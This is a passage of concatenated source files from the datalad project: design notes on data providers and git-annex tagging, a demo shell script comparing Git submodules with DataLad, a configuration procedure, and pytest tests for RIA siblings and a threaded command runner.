all.\n\n\nWithin-branch\n-------------\n\nOther \"Filters\" should operate within the branch, primarily simply for\nchecking the content\n\n\nChecksum\n~~~~~~~~\n\ne.g. 
point to MD5SUMS file stored in the branch, provide how file\nnames must be augmented, run verification -- no files output, just the\nstatus\n\nAddurl\n~~~~~~\n\nIf the repository is going/was published also online under some URL.\nWe might like to populate files with corresponding urls.\n\n [filter:addurl]\n prefix = http://psydata.ovgu.de/forrest_gump/.git/annex/\n check = (False|True) # to verify presence or not ???\n\nUsecase -- Michael's forrest_gump repository. Now files are not\nassociated explicitly with that URL -- only via a regular git remote.\nThis cumbersomes work with clones which then all must have original\nrepository added as a remote.\n\n`check = False` could be the one needed for a 'publish' operation\nwhere this data present locally is not yet published anywhere.\n\nTagging\n~~~~~~~\n\nWe might like to tag files... TODO: think what to provide/use to\ndevelop nice tags.\n\nIdeas:\n\n- a tag given a set of filename regexps\n\n [tag:anatomicals]\n files = .*\\_anat\\.nii\\.gz\n tag = modality=anatomy\n\n or just\n\n [tag:anatomicals]\n files = .*\\_anat\\.nii\\.gz\n tag = anatomy\n\n if it is just a tag (anatomy) without a field\n\n - (full)filename regexp with groups defining possibly multiple\n tag/value pairs\n\n [tag:modality]\n files = .*\\_(?P<modality>\\S*)\\.nii\\.gz\n translate = anat: T1 # might need some translation dictionary?\n dwi: DTI\n\n\nNotes:\n- metadata cane be added only to files under git-annex control so those\n directly committed\n\nDesign thoughts\n===============\n\nData providers should provide a unified interface\n\nDataProvider\n~~~~~~~~~~~~\n\nCommon Parameters\n- add_to_git - what files to commit to git directly (should we leverage\n git-annex largefiles option somehow?)\n- ignore - what files to ignore\n\n- get_items(version=None) - return a list of Files\n- get_item_by_name\n- get_item_by_md5\n - should those be additional interfaces?\n - what if multiple items fulfill (content is the same, e.g. empty, names differ,\n we better get the most appropriate in the name or don't give a damn?)\n - what if a collision????\n- get_item_by_sha256\n - e.g. natively provided by 'Branch' provider for annexed files\n (what to do about git committed ones -- compute/keep info?)\n- get_versions(min_version=None)\n provider-wide version (i.e. not per file). E.g. S3\n provider can have multiple versions of files.\n Might be that it needs to return a DAG of versions i.e. a\n (version, [prev_version1, prev_version2, ...]) to represent e.g.\n history of a Git repo. In most of the cases would be degenerate to just\n one prev version, in which case could just be (version, ).\n We would need to store that meta-information for future updates at least\n for the last version so we could 'grow' next ones on top.\n- ? get_release_versions() -- by default identical to above... but might\n differ (update was, but no new official release (yet), so no release\n tag)\n- get_version_metainformation() -- primarily conceived when thinking\n about monitoring other VCS repos... so should be information to be\n used for a new Git commit into this new repository\n\n.. note:\n\n Keep in mind\n - Web DataProvider must have an option to request the content filename\n (addressing use case with redirects etc)\n - Some providers might have multiple URIs (mirrors) so right away\n assign them per each file... As such they might be from\n different Hostings!\n\n\nFile\n~~~~\n\nwhat would be saved as a file. Should know about itself... 
and origins!\n\n- filename\n- URIs - list containing origins (e.g. URLs) on where to fetch it from.\n  First provided by the\n  original DataProvider, but then might be expanded using\n  other DataProviders\n  Q: Those might need to be not just URIs but some classes associated\n  with original Hosting's, e.g. for the cases of authentication etc?\n  or we would associate with a Hosting based on the URI?\n  # combination of known fields should be stored/used to detect changes\n  # Different data providers might rely on a different subset of below\n  # to see if there was a change. We should probably assume some\n  # \"correspondence\"\n- key # was thinking about Branch as DataProvider -- those must be reused\n- md5\n- sha256\n- mtime\n- size\n\nIt will be the job of a DataProvider to initiate File with the\nappropriate filename.\n\nURI\n~~~\n\n-> URL(URI): will be our first and main \"target\" but it could\n   also be direct S3, etc.\n\na URI should be associated with a \"Hosting\" (many-to-one), so we could\ne.g. provide authentication information per actual \"Hosting\" as the\nentity. But now we are getting back to DataProvider, which is the\nHosting, or actually also a part of it (since Hosting could serve\nmultiple Providers, e.g. OpenfMRI -> providers per each dataset?)\nBut also Provider might use/point to multiple Hostings (e.g. mirrors\nlisted on nitp-2013).\n\nHosting\n~~~~~~~\n\nEach DataProvider would be a factory of File's.\n\n\nIdeas to not forget\n~~~~~~~~~~~~~~~~~~~\n\n- Before carrying out some operation, remember the state of all\n  (involved) branches, so it would be very easy later on to \"cancel\"\n  the entire transaction through a set of 'git reset --hard' or\n  'update-ref's.\n\n  Keep log of the above!\n\n- multiple data providers could be specified but there should be\n  'primary' and 'complementary' ones:\n\n  - primary provider(s) define the layout/content\n  - complementary providers just provide references to additional\n    locations where that data (uniquely identified via checksums etc)\n    could be obtained, so we could add more data providing urls\n  - Q: should all DataProvider's be able to serve as primary and complementary?\n  - most probably we should allow for an option to 'fail' or issue a\n    warning in some cases\n    - secondary provider doesn't carry a requested load/file\n    - secondary provider provides some files not provided by the primary\n      data provider\n\n- at the end of the crawl operation, verify that all the files have all\n  and only urls from the provided data providers\n\n- allow to add/specify conventional git/annex clones as additional,\n  conventional (non special) remotes to be added.\n\n- allow to prepopulate URLs given e.g. prospective hosting on HTTP.\n  This way whenever content gets published there -- all files would\n  have appropriate URLs associated and would 'transcend' through the\n  clones without requiring adding original remote.\n\nUpdates\n=======\n\n- must track updates and removals of the files\n- must verify presence (add, remove) of the urls associated with the\n  files given a list of data providers\n\n\nMeta information\n================\n\nSince a while `git annex` provides a neat feature allowing to assign\ntags to the files and later use e.g. `git annex view` to quickly\ngenerate customized views of the repository.\n\n\nSome cool related tools\n=======================\n\nhttps://github.com/scrapy/scrapely\n  Pure Python (no DOM, lxml, etc) scraping of pages, \"training\" the\n  scraper given a sample. 
May be could be handy???\nhttps://github.com/scrapy/slybot\n Brings together scrapy + scrapely to provide json-specs for\n spiders/items/etc\n Might be worth at least adopting spiders specs...?\n Has a neat slybot/validation/schemas.json which validates the schematic \n" }, { "alpha_fraction": 0.7240251898765564, "alphanum_fraction": 0.7242587208747864, "avg_line_length": 38.2935791015625, "blob_id": "29092aec3b1055cf7b1eb928028f6c096f72c0f0", "content_id": "a9e91269f4f4cc42a8d153873312bdbfa015b300", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4283, "license_type": "permissive", "max_line_length": 187, "num_lines": 109, "path": "/docs/casts/datalad_convenience_vs_git.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "say \"Fast forward through some prior work...\"\n\nsay \"Let's assume a student developed an algorithm, using Git.\"\nrun \"mkdir code; cd code; git init; touch work; git add work ; git commit -m 'MSc thesis by student A done'; cd ..\"\n\nsay \"An another student collected some data, tracked with Git-annex.\"\nrun \"mkdir data; cd data; git init; git annex init; echo 'DATA!' > work; git annex add work ; git commit -m 'Data collection by student B done'; cd ..\"\n\nsay \"A postdoc performed an analysis with the new algorithm on that data, results tracked with Git-annex.\"\n\nrun \"mkdir analysis; cd analysis; git init && git annex init\"\n\nsay \"Git submodules are perfect for versioned tracking of dependencies, code or data.\"\nrun \"git submodule add ../code\"\nrun \"git submodule add ../data\"\nrun \"git -C data annex init\"\nrun \"git commit -m 'Add dependencies'\"\n\nrun \"touch work; git add work && git commit -m 'Analysis by postdoc done'; cd ..\"\n\nsay \"This happened in the past... Now the students left and the postdocs is on vacation. Time for the PI to write up the paper...\"\n\nsay \"The paper is nothing but a new project that depends on the analysis of the study it will describe.\"\nrun \"mkdir paper\"\nrun \"cd paper\"\nrun \"git init\"\nrun \"git submodule add ../analysis study\"\nsay \"Need to remember what the postdoc said: If a repo uses git-annex, need to init it. Does it?\"\nrun \"git -C study branch -a | grep git-annex\"\nsay \"Ok, seems to be\"\nrun \"git -C study annex init\"\nrun \"git commit -m 'Add analysis'\"\n\nsay \"Let Git assemble the entire working tree\"\nrun \"git submodule update --init --recursive\"\n\nsay \"Arrgh, there is a bug in the code, and the postdoc isn't here to work the fix in. But hey, Git is all distributed -- let's apply it right here, so we can move on with the science...\"\nrun \"echo 'fix' >> study/code/work\"\n\nsay \"Quickly commit the fix, so it can be pushed upstream later...\"\nrun \"git add study/code/work\"\n\nsay \"Erm... Needs to happen in the repository that actually contains the file...Need to look up the boundaries...\"\nrun \"git diff --submodule=diff\"\n\nsay \"Ok, let's do this...\"\nrun \"cd study/code\"\nrun \"git add work && git commit -m 'Fix'\"\n\nsay \"Damn, detached HEAD. Need to fix, or it will be difficult to push.\"\nrun \"git reset HEAD~1\"\nrun \"git checkout master\"\nrun \"git add work && git commit -m 'Fix'\"\n\nsay \"Still have to commit all the way up...one sec...\"\nrun \"cd ..\"\nrun \"git add code && git commit -m 'Fix'\"\nrun \"cd ..\"\nrun \"git add study && git commit -m 'Fix'\"\n\nsay \"All fixed and committed, ready to start. 
Hopefully, there are no more bugs...\"\n\nsay \"Just need to have one quick look at the data. Git-annex will obtain it in no time...\"\nrun \"git annex get study/data/work\"\n\nsay \"Ah, right. Also needs to be done in the repository that actually has the file. I still remember the boundaries...Gotta keep them in mind.\"\nrun \"git -C study/data annex get work\"\n\nsay \"Good! Now back to writing!\"\n\n\nsay \"So far the story with Git/Git-annex. Let's see how the exact same looks with DataLad...\"\nsay \"But first clean up...\"\nrun \"cd ..\"\nrun \"rm -rf paper\"\n\nsay \"Git-annex protects the files it manages. First a user needs to give enough permissions.\"\nrun \"chmod -R u+rwx paper\"\nrun \"rm -rf paper\"\n\nsay \"Now DataLad. We can use the identical repositories for the prior student and postdoc work. DataLad does not require that everyone uses DataLad.\"\nrun \"datalad create --no-annex paper\"\nrun \"cd paper\"\n\nsay \"Cloning a dataset INTO a specified (super)dataset makes it a subdataset.\"\nrun \"datalad clone --dataset . ../analysis study\"\nsay \"Requesting a particular file automatically obtains all needed subdatasets\"\nrun \"datalad get study/code/work\"\n\nsay \"Apply the code fix, and have it be detected\"\nrun \"echo 'fix' >> study/code/work\"\nrun \"datalad status\"\n\nsay \"Unlike Git, DataLad makes nested datasets feel like a monorepo\"\nrun \"datalad status --recursive\"\n\nsay \"Not just for reporting, but also for modification\"\nrun \"datalad save --dataset . -m 'Fix' study/code/work\"\nrun \"datalad status\"\n\nsay \"All modifications are committed up to a specified superdataset\".\n\nsay \"Requesting an annex'ed files is no different from any other file\"\nrun \"datalad get study/data/work\"\nrun \"cat study/data/work\"\n\nsay \"When done, just remove\"\nrun \"cd ..\"\nrun \"datalad remove --dataset paper --recursive\"\n" }, { "alpha_fraction": 0.6869918704032898, "alphanum_fraction": 0.6910569071769714, "avg_line_length": 27.384614944458008, "blob_id": "6e6f0f576fc658ebd60b43182a8a3acd77826967", "content_id": "0563af1ef8daadd4ae38810125fdd8e5b1411784", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 738, "license_type": "permissive", "max_line_length": 72, "num_lines": 26, "path": "/datalad/resources/procedures/cfg_text2git.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\"\"\"Procedure to configure Git annex to add text files directly to Git\"\"\"\n\nimport sys\nimport os.path as op\n\nfrom datalad.distribution.dataset import require_dataset\n\nds = require_dataset(\n sys.argv[1],\n check_installed=True,\n purpose='configuration')\n\nannex_largefiles = '((mimeencoding=binary)and(largerthan=0))'\nattrs = ds.repo.get_gitattributes('*')\nif not attrs.get('*', {}).get(\n 'annex.largefiles', None) == annex_largefiles:\n ds.repo.set_gitattributes([\n ('*', {'annex.largefiles': annex_largefiles})])\n\ngit_attributes_file = op.join(ds.path, '.gitattributes')\nds.save(\n git_attributes_file,\n message=\"Instruct annex to add text files to Git\",\n result_renderer='disabled'\n)\n" }, { "alpha_fraction": 0.5748191475868225, "alphanum_fraction": 0.5807018876075745, "avg_line_length": 36.92051315307617, "blob_id": "02183d60e439377041fdb014d75db254b9cc2b67", "content_id": "d541295c10bcf75813a547fdfbff117a1e6e1c86", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 
14789, "license_type": "permissive", "max_line_length": 99, "num_lines": 390, "path": "/datalad/distributed/tests/test_create_sibling_ria.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport logging\nimport os.path as op\nfrom functools import wraps\nfrom unittest.mock import patch\n\nfrom datalad import cfg as dl_cfg\nfrom datalad.api import (\n Dataset,\n clone,\n)\nfrom datalad.support.network import get_local_file_url\nfrom datalad.tests.utils_pytest import (\n assert_false,\n assert_in,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n attr,\n chpwd,\n eq_,\n known_failure_githubci_win,\n ok_exists,\n skip_if_on_windows,\n skip_ssh,\n skip_wo_symlink_capability,\n slow,\n swallow_logs,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import Path\n\n\ndef with_store_insteadof(func):\n \"\"\"decorator to set a (user-) config and clean up afterwards\"\"\"\n\n @wraps(func)\n @attr('with_config')\n def _wrap_with_store_insteadof(*args, **kwargs):\n host = args[0]\n base_path = args[1]\n try:\n dl_cfg.set('url.ria+{prot}://{host}{path}.insteadOf'\n ''.format(prot='ssh' if host else 'file',\n host=host if host else '',\n path=base_path),\n 'ria+ssh://test-store:', scope='global', reload=True)\n return func(*args, **kwargs)\n finally:\n dl_cfg.unset('url.ria+{prot}://{host}{path}.insteadOf'\n ''.format(prot='ssh' if host else 'file',\n host=host if host else '',\n path=base_path),\n scope='global', reload=True)\n return _wrap_with_store_insteadof\n\n\n@with_tempfile\ndef test_invalid_calls(path=None):\n\n ds = Dataset(path).create()\n\n # no argument:\n assert_raises(TypeError, ds.create_sibling_ria)\n\n # same name for git- and special remote:\n assert_raises(ValueError, ds.create_sibling_ria, 'ria+file:///some/where',\n name='some', storage_name='some')\n\n # missing ria+ URL prefix\n assert_result_count(\n ds.create_sibling_ria(\n 'file:///some/where', name='some', on_failure='ignore'),\n 1,\n status='error',\n )\n\n\n@skip_if_on_windows # running into short path issues; same as gh-4131\n@with_tempfile\n@with_store_insteadof\n@with_tree({'ds': {'file1.txt': 'some'},\n 'sub': {'other.txt': 'other'},\n 'sub2': {'evenmore.txt': 'more'}})\n@with_tempfile(mkdir=True)\ndef _test_create_store(host, base_path=None, ds_path=None, clone_path=None):\n\n ds = Dataset(ds_path).create(force=True)\n\n subds = ds.create('sub', force=True)\n subds2 = ds.create('sub2', force=True, annex=False)\n ds.save(recursive=True)\n assert_repo_status(ds.path)\n # don't specify special remote. 
By default should be git-remote + \"-storage\"\n res = ds.create_sibling_ria(\"ria+ssh://test-store:\", \"datastore\",\n post_update_hook=True, new_store_ok=True)\n assert_result_count(res, 1, status='ok', action='create-sibling-ria')\n\n # remotes exist, but only in super\n siblings = ds.siblings(result_renderer='disabled')\n eq_({'datastore', 'datastore-storage', 'here'},\n {s['name'] for s in siblings})\n sub_siblings = subds.siblings(result_renderer='disabled')\n eq_({'here'}, {s['name'] for s in sub_siblings})\n sub2_siblings = subds2.siblings(result_renderer='disabled')\n eq_({'here'}, {s['name'] for s in sub2_siblings})\n\n # check bare repo:\n git_dir = Path(base_path) / ds.id[:3] / ds.id[3:]\n\n # The post-update hook was enabled.\n ok_exists(git_dir / \"hooks\" / \"post-update\")\n # And create_sibling_ria took care of an initial call to\n # git-update-server-info.\n ok_exists(git_dir / \"info\" / \"refs\")\n\n git_config = git_dir / 'config'\n ok_exists(git_config)\n content = git_config.read_text()\n assert_in(\"[datalad \\\"ora-remote\\\"]\", content)\n super_uuid = ds.config.get(\"remote.{}.annex-uuid\".format('datastore-storage'))\n assert_in(\"uuid = {}\".format(super_uuid), content)\n\n # implicit test of success by ria-installing from store:\n ds.push(to=\"datastore\")\n with chpwd(clone_path):\n if host:\n # note, we are not using the \"test-store\"-label here\n clone('ria+ssh://{}{}#{}'.format(host, base_path, ds.id),\n path='test_install')\n else:\n # TODO: Whenever ria+file supports special remote config (label),\n # change here:\n clone('ria+file://{}#{}'.format(base_path, ds.id),\n path='test_install')\n installed_ds = Dataset(op.join(clone_path, 'test_install'))\n assert installed_ds.is_installed()\n assert_repo_status(installed_ds.repo)\n eq_(installed_ds.id, ds.id)\n # Note: get_annexed_files() always reports POSIX paths.\n assert_in('ds/file1.txt',\n installed_ds.repo.get_annexed_files())\n assert_result_count(installed_ds.get(op.join('ds', 'file1.txt')),\n 1,\n status='ok',\n action='get',\n path=op.join(installed_ds.path, 'ds', 'file1.txt'))\n # repeat the call to ensure it doesn't crash (see #6950)\n res = ds.create_sibling_ria(\"ria+ssh://test-store:\", \"datastore\", on_failure='ignore')\n assert_result_count(res, 1, status='error', action='create-sibling-ria', message=(\n \"a sibling %r is already configured in dataset %r\",\n 'datastore', ds.path))\n\n # now, again but recursive.\n res = ds.create_sibling_ria(\"ria+ssh://test-store:\", \"datastore\",\n recursive=True, existing='reconfigure',\n new_store_ok=True)\n assert_result_count(res, 1, path=str(ds.pathobj), status='ok', action=\"create-sibling-ria\")\n assert_result_count(res, 1, path=str(subds.pathobj), status='ok', action=\"create-sibling-ria\")\n assert_result_count(res, 1, path=str(subds2.pathobj), status='ok', action=\"create-sibling-ria\")\n\n # remotes now exist in super and sub\n siblings = ds.siblings(result_renderer='disabled')\n eq_({'datastore', 'datastore-storage', 'here'},\n {s['name'] for s in siblings})\n sub_siblings = subds.siblings(result_renderer='disabled')\n eq_({'datastore', 'datastore-storage', 'here'},\n {s['name'] for s in sub_siblings})\n # but no special remote in plain git subdataset:\n sub2_siblings = subds2.siblings(result_renderer='disabled')\n eq_({'datastore', 'here'},\n {s['name'] for s in sub2_siblings})\n\n # for testing trust_level parameter, redo for each label:\n for trust in ['trust', 'semitrust', 'untrust']:\n 
ds.create_sibling_ria(\"ria+ssh://test-store:\",\n \"datastore\",\n existing='reconfigure',\n trust_level=trust,\n new_store_ok=True)\n res = ds.repo.repo_info()\n assert_in('[datastore-storage]',\n [r['description']\n for r in res['{}ed repositories'.format(trust)]])\n\n\n@slow # 11 + 42 sec on travis\ndef test_create_simple():\n\n _test_create_store(None)\n # TODO: Skipped due to gh-4436\n skip_if_on_windows(skip_ssh(_test_create_store))('datalad-test')\n\n\n@skip_ssh\n@skip_if_on_windows # ORA remote is incompatible with windows clients\n@with_tempfile\n@with_tree({'ds': {'file1.txt': 'some'},\n 'sub': {'other.txt': 'other'},\n 'sub2': {'evenmore.txt': 'more'}})\n@with_tempfile\ndef test_create_push_url(detection_path=None, ds_path=None, store_path=None):\n\n store_path = Path(store_path)\n ds_path = Path(ds_path)\n detection_path = Path(detection_path)\n\n ds = Dataset(ds_path).create(force=True)\n ds.save()\n\n # patch SSHConnection to signal it was used:\n from datalad.support.sshconnector import SSHManager\n def detector(f, d):\n @wraps(f)\n def _wrapper(*args, **kwargs):\n d.touch()\n return f(*args, **kwargs)\n return _wrapper\n\n url = \"ria+{}\".format(store_path.as_uri())\n push_url = \"ria+ssh://datalad-test{}\".format(store_path.as_posix())\n assert not detection_path.exists()\n\n with patch('datalad.support.sshconnector.SSHManager.get_connection',\n new=detector(SSHManager.get_connection, detection_path)):\n\n ds.create_sibling_ria(url, \"datastore\", push_url=push_url,\n new_store_ok=True)\n # used ssh_manager despite file-url hence used push-url (ria+ssh):\n assert detection_path.exists()\n\n # correct config in special remote:\n sr_cfg = ds.repo.get_special_remotes()[\n ds.siblings(name='datastore-storage')[0]['annex-uuid']]\n eq_(sr_cfg['url'], url)\n eq_(sr_cfg['push-url'], push_url)\n\n # git remote based on url (local path):\n eq_(ds.config.get(\"remote.datastore.url\"),\n (store_path / ds.id[:3] / ds.id[3:]).as_posix())\n eq_(ds.config.get(\"remote.datastore.pushurl\"),\n \"ssh://datalad-test{}\".format((store_path / ds.id[:3] / ds.id[3:]).as_posix()))\n\n # git-push uses SSH:\n detection_path.unlink()\n ds.push('.', to=\"datastore\", data='nothing')\n assert detection_path.exists()\n\n # data push\n # Note, that here the patching has no effect, since the special remote\n # is running in a subprocess of git-annex. Hence we can't detect SSH\n # usage really. 
However, ORA remote is tested elsewhere - if it succeeds\n # all should be good wrt `create-sibling-ria`.\n ds.repo.call_annex(['copy', '.', '--to', 'datastore-storage'])\n\n\n@skip_if_on_windows\n@skip_wo_symlink_capability\n@with_tempfile\n@with_tempfile\n@with_tempfile\ndef test_create_alias(ds_path=None, ria_path=None, clone_path=None):\n ds_path = Path(ds_path)\n clone_path = Path(clone_path)\n\n ds_path.mkdir()\n dsa = Dataset(ds_path / \"a\").create()\n\n res = dsa.create_sibling_ria(url=\"ria+file://{}\".format(ria_path),\n name=\"origin\",\n alias=\"ds-a\",\n new_store_ok=True)\n assert_result_count(res, 1, status='ok', action='create-sibling-ria')\n\n ds_clone = clone(source=\"ria+file://{}#~ds-a\".format(ria_path),\n path=clone_path / \"a\")\n assert_repo_status(ds_clone.path)\n\n # multiple datasets in a RIA store with different aliases work\n dsb = Dataset(ds_path / \"b\").create()\n\n res = dsb.create_sibling_ria(url=\"ria+file://{}\".format(ria_path),\n name=\"origin\",\n alias=\"ds-b\",\n new_store_ok=True)\n assert_result_count(res, 1, status='ok', action='create-sibling-ria')\n\n ds_clone = clone(source=\"ria+file://{}#~ds-b\".format(ria_path),\n path=clone_path / \"b\")\n assert_repo_status(ds_clone.path)\n\n # second dataset in a RIA store with the same alias emits a warning\n dsc = Dataset(ds_path / \"c\").create()\n\n with swallow_logs(logging.WARNING) as cml:\n res = dsc.create_sibling_ria(url=\"ria+file://{}\".format(ria_path),\n name=\"origin\",\n alias=\"ds-a\",\n new_store_ok=True)\n assert_in(\"Alias 'ds-a' already exists in the RIA store, not adding an alias\",\n cml.out)\n assert_result_count(res, 1, status='ok', action='create-sibling-ria')\n\n\n@skip_if_on_windows # ORA remote is incompatible with windows clients\n@with_tempfile\n@with_tree({'ds': {'file1.txt': 'some'}})\ndef test_storage_only(base_path=None, ds_path=None):\n store_url = 'ria+' + get_local_file_url(base_path)\n\n ds = Dataset(ds_path).create(force=True)\n ds.save(recursive=True)\n assert_repo_status(ds.path)\n\n res = ds.create_sibling_ria(store_url, \"datastore\", storage_sibling='only',\n new_store_ok=True)\n assert_result_count(res, 1, status='ok', action='create-sibling-ria')\n eq_(len(res), 1)\n\n # the storage sibling uses the main name, not -storage\n siblings = ds.siblings(result_renderer='disabled')\n eq_({'datastore', 'here'},\n {s['name'] for s in siblings})\n\n # smoke test that we can push to it\n res = ds.push(to='datastore')\n assert_status('ok', res)\n assert_result_count(res, 1, action='copy')\n\n\n@known_failure_githubci_win # reported in https://github.com/datalad/datalad/issues/5210\n@with_tempfile\n@with_tempfile\n@with_tree({'ds': {'file1.txt': 'some'}})\ndef test_no_storage(store1=None, store2=None, ds_path=None):\n store1_url = 'ria+' + get_local_file_url(store1)\n store2_url = 'ria+' + get_local_file_url(store2)\n\n ds = Dataset(ds_path).create(force=True)\n ds.save(recursive=True)\n assert_repo_status(ds.path)\n\n res = ds.create_sibling_ria(store1_url, \"datastore1\", storage_sibling=False,\n new_store_ok=True)\n assert_result_count(res, 1, status='ok', action='create-sibling-ria')\n eq_({'datastore1', 'here'},\n {s['name'] for s in ds.siblings(result_renderer='disabled')})\n\n # deprecated way of disabling storage still works\n res = ds.create_sibling_ria(store2_url, \"datastore2\",\n storage_sibling=False, new_store_ok=True)\n assert_result_count(res, 1, status='ok', action='create-sibling-ria')\n eq_({'datastore2', 'datastore1', 'here'},\n {s['name'] for s in 
ds.siblings(result_renderer='disabled')})\n\n # no annex/object dir should be created when there is no special remote\n # to use it.\n for s in [store1, store2]:\n p = Path(s) / ds.id[:3] / ds.id [3:] / 'annex' / 'objects'\n assert_false(p.exists())\n\n # smoke test that we can push to it\n res = ds.push(to='datastore1')\n assert_status('ok', res)\n # but nothing was copied, because there is no storage sibling\n assert_result_count(res, 0, action='copy')\n\n\n@with_tempfile\ndef test_no_store(path=None):\n ds = Dataset(path).create()\n # check that we fail without '--new-store-ok' when there is no store\n assert_result_count(\n ds.create_sibling_ria(\n \"'ria+file:///no/where'\", \"datastore\",\n on_failure='ignore'),\n 1,\n status=\"error\")\n\n# TODO: explicit naming of special remote\n" }, { "alpha_fraction": 0.6033862233161926, "alphanum_fraction": 0.6092343926429749, "avg_line_length": 31.00523567199707, "blob_id": "b4b77e3e7aacba298dbbdb3d672c4b3e435a0880", "content_id": "4cabc25c1f6f25c4a9ad2e4b359e190243d0853d", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24452, "license_type": "permissive", "max_line_length": 129, "num_lines": 764, "path": "/datalad/runner/tests/test_nonasyncrunner.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil; coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test the thread based runner (aka. non asyncio based runner).\n\"\"\"\nfrom __future__ import annotations\n\nimport asyncio\nimport os\nimport queue\nimport signal\nimport subprocess\nimport sys\nimport time\nfrom collections.abc import (\n Generator,\n Iterator,\n)\nfrom itertools import count\nfrom queue import Queue\nfrom threading import Thread\nfrom time import sleep\nfrom typing import (\n Any,\n Optional,\n)\nfrom unittest.mock import (\n MagicMock,\n patch,\n)\n\nimport pytest\n\nfrom datalad.tests.utils_pytest import (\n assert_false,\n assert_raises,\n assert_true,\n eq_,\n known_failure_osx,\n known_failure_windows,\n with_tempfile,\n)\nfrom datalad.utils import on_windows\n\nfrom .. 
import (\n NoCapture,\n Protocol,\n Runner,\n StdOutCapture,\n StdOutErrCapture,\n)\nfrom ..nonasyncrunner import (\n IOState,\n ThreadedRunner,\n run_command,\n)\nfrom ..protocol import GeneratorMixIn\nfrom ..runnerthreads import (\n ReadThread,\n WriteThread,\n)\nfrom ..utils import LineSplitter\nfrom .utils import py2cmd\n\n\n# Protocol classes used for a set of generator tests later\nclass GenStdoutStderr(GeneratorMixIn, StdOutErrCapture):\n def __init__(self,\n done_future: Any = None,\n encoding: Optional[str] = None) -> None:\n\n StdOutErrCapture.__init__(\n self,\n done_future=done_future,\n encoding=encoding)\n GeneratorMixIn.__init__(self)\n\n def timeout(self, fd: Optional[int]) -> bool:\n return True\n\n\nclass GenNothing(GeneratorMixIn, NoCapture):\n def __init__(self,\n done_future: Any = None,\n encoding: Optional[str] = None) -> None:\n\n NoCapture.__init__(\n self,\n done_future=done_future,\n encoding=encoding)\n GeneratorMixIn.__init__(self)\n\n\nclass GenStdoutLines(GeneratorMixIn, StdOutCapture):\n \"\"\"A generator-based protocol yielding individual subprocess' stdout lines\n\n This is a simple implementation that is good enough for tests, i.e. with\n controlled inpute. It will fail if data is delivered in parts to\n self.pipe_data_received that are split inside an encoded character.\n \"\"\"\n def __init__(self,\n done_future: Any = None,\n encoding: Optional[str] = None) -> None:\n\n StdOutCapture.__init__(\n self,\n done_future=done_future,\n encoding=encoding)\n GeneratorMixIn.__init__(self)\n self.line_splitter = LineSplitter()\n\n def timeout(self, fd: Optional[int]) -> bool:\n return True\n\n def pipe_data_received(self, fd: int, data: bytes) -> None:\n for line in self.line_splitter.process(data.decode(self.encoding)):\n self.send_result(line)\n\n def pipe_connection_lost(self, fd: int, exc: Optional[BaseException]) -> None:\n remaining_line = self.line_splitter.finish_processing()\n if remaining_line is not None:\n self.send_result(remaining_line)\n\n\ndef test_subprocess_return_code_capture() -> None:\n\n class KillProtocol(Protocol):\n\n proc_out = True\n proc_err = True\n\n def __init__(self, signal_to_send: int, result_pool: dict) -> None:\n super().__init__()\n self.signal_to_send = signal_to_send\n self.result_pool = result_pool\n\n def connection_made(self, process: subprocess.Popen) -> None:\n super().connection_made(process)\n process.send_signal(self.signal_to_send)\n\n def connection_lost(self, exc: Optional[BaseException]) -> None:\n self.result_pool[\"connection_lost_called\"] = (True, exc)\n\n def process_exited(self) -> None:\n self.result_pool[\"process_exited_called\"] = True\n\n # windows doesn't support SIGINT but would need a Ctrl-C\n signal_to_send = signal.SIGTERM if on_windows else signal.SIGINT\n result_pool: dict[str, Any] = dict()\n result = run_command([\"waitfor\", \"/T\", \"10000\", \"TheComputerTurnsIntoATulip\"]\n if on_windows\n else [\"sleep\", \"10000\"],\n KillProtocol,\n None,\n {\n \"signal_to_send\": signal_to_send,\n \"result_pool\": result_pool\n },\n exception_on_error=False)\n assert isinstance(result, dict)\n if not on_windows:\n # this one specifically tests the SIGINT case, which is not supported\n # on windows\n eq_(result[\"code\"], -signal_to_send)\n assert_true(result_pool[\"connection_lost_called\"][0])\n assert_true(result_pool[\"process_exited_called\"])\n\n\ndef test_interactive_communication() -> None:\n\n class BidirectionalProtocol(Protocol):\n\n proc_out = True\n proc_err = True\n\n def __init__(self, 
